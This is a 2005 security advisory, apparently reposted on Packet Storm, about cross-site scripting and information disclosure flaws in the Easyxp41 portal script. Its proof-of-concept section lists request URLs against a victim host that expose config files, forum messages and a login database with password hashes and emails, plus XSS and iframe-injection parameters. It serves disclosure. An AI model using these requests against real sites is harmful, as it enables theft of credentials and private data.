Easyxp41 suffers from multiple cross site scripting and data disclosure flaws. An excessive amount of detailed exploitation is provided.
b11be99fc0ea0ceadd4afffe67998e76b1846a48d50741151bb21bbbc661d62dXSS flaws and data disclosure in Easyxp41
################################################
XSS flaws and data dliclosure in Easyxp41
vendor url: http://www.easypx41.be/
advisory: http://falcondeoro.blogspot.com/2005/07/
xss-flaws-and-data-disclosure-in.html
vendor notify: Yes exploit available: Yes
##################################################
Easyxp41 es a free script to make web portal.Yo can run it very
easy.Easyxp41 , contains very flaw that open direct files and you can
seethe contain to it.
###########
verions
###########
CMS full
CMS test
###############
Solution
###############
No solution at this time !!
###################
Timeline
###################
Discovered: 26-07-2005
Vendor notify:29-07-2005
Disclosure:29-07-2005
############
proof of concepts
############
################################################
information disclosure in /forum/ folder:
#########################################
http://[victim]/modules/forum/cfg/
http://[victim]/modules/forum/db/
http://[victim]/modules/forum/msg/
http://[victim]/modules/forum/admin/index.php
http://[victim]/modules/forum/msg/1103495330.dat
#############
information disclosure in /login/ folder:
#############
http://[victim]/modules/login/
http://[victim]/modules/login/login.php
http://[victim]/modules/login/admin/option.php
http://[victim]/modules/login/cfg/modules.cfg
http://[victim]/cfg/config.cfg
http://[victim]/mesdocuments/
http://[victim]/modules/news/
#############
Cross-site scripting & variable injections.
#############
http://[victim]/index.php?pg=&L=[variable-injection]&H=[variable-injection]
http://[victim]/index.php?pg=[change-url]&pgtype=iframe&L=500&H=500
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=Forum%20de%20démonstration.&msg=1103495330.dat&pgfull[variable-injection]
http://[victim]/index.php?pg=http://google.fr&pgtype=iframe&L=500&H=500
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[Code-XSS]
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=[Code-XSS]&pgfull
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]&pgfull[variable-injection]
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]
Bad definition to variable forum = , with the flaw to up
:modules/forum/msg we can read the messages without be identify in
PHP:
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=[change-or-variable-injection].&msg=1103495330.dat&pgfull
##################
Name to file .dat to contain messages forum disclosure
http://[victim]/modules/forum/db/rep.db
##########################
User and password hash disclosure
http://[victim]modules/login/db/login.db
##########################
user email disclosuremodules/login/db/login.db
############################# €nd ##########################
Thxs to Lostmon for support (lostmon@gmail.com) http://lostmon.blogspot.com/
--
Atentamente:
FalconDeOro (falcondeoro.blogspot.com)
Web-Blog: http://falcondeoro.blogspot.com
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed